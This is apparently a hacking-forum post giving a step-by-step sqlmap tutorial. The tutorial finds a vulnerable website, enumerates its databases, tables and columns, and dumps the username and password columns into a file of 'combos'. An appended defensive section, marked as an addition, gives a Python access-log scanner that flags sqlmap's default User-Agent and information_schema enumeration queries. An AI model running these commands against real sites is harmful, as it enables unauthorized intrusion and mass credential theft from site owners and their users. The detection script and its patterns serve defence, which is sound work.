Quote
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Show support for a more advanced tutorial ++ I'm not going to waste my time if people just leech. The tutorial is inside hide tags to keep the thread active.
[hide]
Simple compact tutorial:
- Change to the SQLMap directory - CD C:\python27\sqlmap (depending on where you placed it)
- Execute vulnerability scanner - sqlmap.py -u <URL>
- Execute database scan - sqlmap.py -u <URL> --dbs
- List the tables of the database you want - sqlmap.py -u <URL> --tables -D <database name>
- Pull columns of the tables - sqlmap.py -u <URL> --columns -T <table name>
- Dump data of columns - sqlmap.py -u <URL> --columns -T <table name> -C <column names> (separate by commas, e.g. a_username,a_password) --dump
- Locate the file, open it, and there are your combos
Tutorial w/ pictures and explanations
Step one: Installation
I will not explain this in depth. You will be running a Python file, so please install version 2: https://www.python.org/ftp/python/2.7.9/python-2.7.9.msi
It should create a folder inside your C:\ drive called python27, this is needed for later.
Next, download SQLMap from https://github.com/sqlmapproject/sqlmap/zipball/master (RENAME IT SQLMAP!) and put it inside the python27 folder so the path is C:\Python27\sqlmap
Step two: Opening the python file for basic help
Open CMD and type CD C:\python27\sqlmap
Ok, we are now in the sqlmap directory! Type sqlmap.py -h for details about all the functions in sqlmap.
Step three: Scanning!
Ok, now it gets good. For this to work you already need to have a vulnerable website. Type:
sqlmap.py -u VULN
If it worked, you will see something like this:
Step four: Idk let's just carry on.
Next we have to identify their databases. Pressing the UP arrow will load the last executed command; press space and then type --dbs
And then ta-da! We have pulled the database.
Now we have to access it, which is super duper easy! Press the UP arrow, delete --dbs and type --tables -D and then the database you want.
So? What did we just do? --tables tells sqlmap we are looking for tables and -D (MUST BE CAPITAL!) tells sqlmap we want to open that database.
If it all goes to plan it should look like this.
Now we have to open the tables for columns!
Press the UP arrow, delete --tables and replace it with --columns, which tells sqlmap we want to open columns, then type -T (CAPITAL!) and then the table you want to open! We are going for user.
Just like before, we should see another table, this one being a_admins only.
We see two things of interest, db_username and db_password. The next task is to pull these and then dump them into a file.
Once again, press the UP arrow and simply add -C database,database, replacing them with the column names you want, and then --dump at the end. This tells sqlmap we want to access both of these columns and then dump them into a file, which creates our combos!
That's it guys, a basic guide on how to dump databases super fast compared to other programs! I suggest reading up on parameters such as --threads=10 and risk / level values. But this will do for this tutorial.
[/hide]
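For defenders: the enumeration steps in this post (--dbs, --tables, --columns) leave recognisable traces in web server access logs. The script below is an added example, not part of the original post or of sqlmap; it assumes combined-format logs, a MySQL-style backend and injection through a GET parameter, and the log lines, path and IP addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format; IPs are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2015:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" '
    '200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '203.0.113.7 - - [10/Mar/2015:10:00:09 +0000] "GET /item.php?id=1%20UNION%20ALL'
    '%20SELECT%20schema_name%20FROM%20INFORMATION_SCHEMA.SCHEMATA HTTP/1.1" '
    '200 734 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Mar/2015:10:00:12 +0000] "GET /item.php?id=7 HTTP/1.1" '
    '200 498 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
# sqlmap names itself in the User-Agent header by default.
SQLMAP_AGENT = re.compile(r"^sqlmap/", re.IGNORECASE)
# Assumption: MySQL-style backend, where listing databases, tables and columns
# means reading these information_schema views.
CATALOG = re.compile(r"information_schema\s*\.\s*(schemata|tables|columns)", re.IGNORECASE)

def classify(line):
    """Return (client_ip, [reasons]) for one log line, or None if unparseable."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    reasons = []
    if SQLMAP_AGENT.match(m["agent"]):
        reasons.append("default-user-agent")
    # Decode twice so double-encoded query strings are still inspected.
    query = unquote_plus(unquote_plus(m["target"].partition("?")[2]))
    hit = CATALOG.search(query)
    if hit:
        reasons.append("catalog-" + hit.group(1).lower())
    return m["ip"], reasons

def scan(lines):
    """Group reasons by client IP, skipping clean and unparseable lines."""
    findings = {}
    for result in filter(None, map(classify, lines)):
        if result[1]:
            findings.setdefault(result[0], set()).update(result[1])
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The User-Agent header is client-controlled, so treat that check as a low-effort signal and rely on the catalog check and on parameterized queries in the application itself. Requests that carry the parameter in a POST body do not appear in standard access logs and need WAF or application-level logging.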


